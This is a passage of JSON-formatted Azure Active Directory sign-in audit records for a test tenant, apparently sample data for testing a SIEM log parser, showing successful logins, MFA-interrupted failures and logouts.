"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "2a23206a-2f5d-4cb7-aeb8-f285d10e6f80"} +{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:30:58", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": 
"Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "175.16.199.1", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "8b270c82-1240-4a0a-ac15-1e1116261400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "c0a0d198-825b-4e39-b868-0a7b0552b209"} +{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:31:33", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "b0faaf7a-913e-4a93-8ccc-ecfaa2b42400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", 
"Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "52b07191-3887-40fb-a001-f4122b0851d1"} +{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:14:25", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "175.16.199.1", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d949d6c2-472e-4901-bd70-96cbfe534c00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "c62fa78d-daab-494e-a638-8321ebd71b9e"} +{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:14:51", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "LogonError": 
"UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "42c7ec91-1e2f-4505-b728-3a165b244f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "73c76212-8120-4e21-a383-c80d8327b606"} +{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:29:56", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "8b8e8663-8a8c-4959-a692-e3eece085300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": 
"UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "29f94716-3717-4671-962e-9c739b764f07"} +{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:51:23", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "361dd87e-3bc9-4f0a-b236-ed7365e28d00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "17d02385-1e30-45b7-949c-4d3dd549a0e7"} +{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:39:45", "Actor": [{"Type": 0, "ID": 
"Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "216.160.83.57", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "32b4cec1-00eb-44ea-be73-adc82387db00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e3346dd0-ecf6-4676-8765-365c7370b6fe"} +{"InterSystemsId": "6fee997e-1b2a-4a95-a8be-ea85642ed652", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:40:16", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "LogonError": "UserStrongAuthClientAuthNRequiredInterrupt", "ApplicationId": "c44b4083-3bb0-49c1-b47d-974e53cbdf3c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "797f4846-ba00-4fd7-ba43-dac1f8f63013"}], "ObjectId": "797f4846-ba00-4fd7-ba43-dac1f8f63013", "ModifiedProperties": [], "ResultStatus": "Failed", "IntraSystemId": "a063e495-5883-4837-8186-582817fdd500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; 
Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "FlowTokenScenario", "Value": "Login"}, {"Name": "UserAuthenticationMethod", "Value": "1"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoginFailed", "Id": "a772fd76-847f-4703-90f1-37eb81c9f392"} +{"InterSystemsId": "7766ac63-ae7f-43e6-868a-a5422a96fd8b", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:33:52", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "67.43.156.12", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "67.43.156.12", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "adc9d69c-8ae6-41c7-b685-331453060a00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "487e4f43-53db-4d6f-a314-5355746d4853"} +{"InterSystemsId": "781c1055-e731-48ee-a806-c3f39ba160e3", "OrganizationId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:53:24", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "e7fe21ea-ec03-46dd-b272-0a72ebbeac00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "41f6b2dc-4db6-444c-93d9-829a842b87e2"} +{"InterSystemsId": "82b07417-7b33-4531-952f-d3f719e2356a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:22", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": 
"00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "280b3410-9d51-4ce3-952d-5bba0bea6600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "ec9fa29b-6201-456d-b228-ca1759e0bf6c"} +{"InterSystemsId": "8571fe85-eb4a-430d-b468-97900e344923", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-06T09:28:04", "Actor": [{"Type": 0, "ID": "Unknown"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "Unknown", "UserType": 5, "UserKey": "Not Available", "ClientIP": "175.16.199.1", "LogonError": "None", "ApplicationId": "", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d239e473-6687-4ff9-ac65-0e3c59961600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "OAuth2:Logout"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e988fd90-2eff-4ad7-9f02-030a9d73ad6e"} +{"InterSystemsId": 
"8d662bc0-0011-424d-a7dc-56bfc5a142b4", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:35", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "d0a4e1ed-206d-4602-aaae-406a02c5c300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3cbf15a5-84d0-4b0e-ba8e-c3ed43477293"} +{"InterSystemsId": "9270f20a-56f2-493e-b6a7-a859adcaf626", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:36", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": 
"175.16.199.1", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "97aa710f-536f-44c8-a8d5-711dc55f5500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d2bb7eae-bc6e-42d2-b270-a885ec626235"} +{"InterSystemsId": "97c52753-c410-438f-89e2-22741e5ccc6a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:49", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c9ef5d5f-e3af-4669-b465-921d8b58bd00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": 
"OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "03de6d95-b955-451c-8311-473b6853d774"} +{"InterSystemsId": "9e0a494b-0db0-4481-a70e-eea6124b7018", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "81.2.69.143", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "81.2.69.143", "ApplicationId": "e48d4214-364e-4731-b2b6-47dabf529218", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000004-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000004-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "e7a84bcf-41ff-4953-8e99-fb1820685f00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "ac8fcffb-7c44-498d-ad6b-24b85a3a1b59"} +{"InterSystemsId": "9fc4af4c-bf19-4f88-92ac-0fd029ca21bd", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:36", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": 
"asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "56fa424b-64bd-4ea5-abc4-38256f8a5600", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "880fb7bc-5708-42d1-86a8-760c32ac5e6b"} +{"InterSystemsId": "a35e980b-88be-4343-9691-629473e01983", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "216.160.83.57", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "216.160.83.57", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "5f09333a-842c-47da-a157-57da27fcbca5"}], "ObjectId": "5f09333a-842c-47da-a157-57da27fcbca5", "ModifiedProperties": [], 
"ResultStatus": "Succeeded", "IntraSystemId": "78a2aa65-5026-4124-970a-00e06dc7df00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "30c7afcc-f74d-4b5a-898e-ce72da9386b8"} +{"InterSystemsId": "a89e9b3b-b394-4ecf-8abc-a3f6aaf9237f", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-06T09:28:00", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": 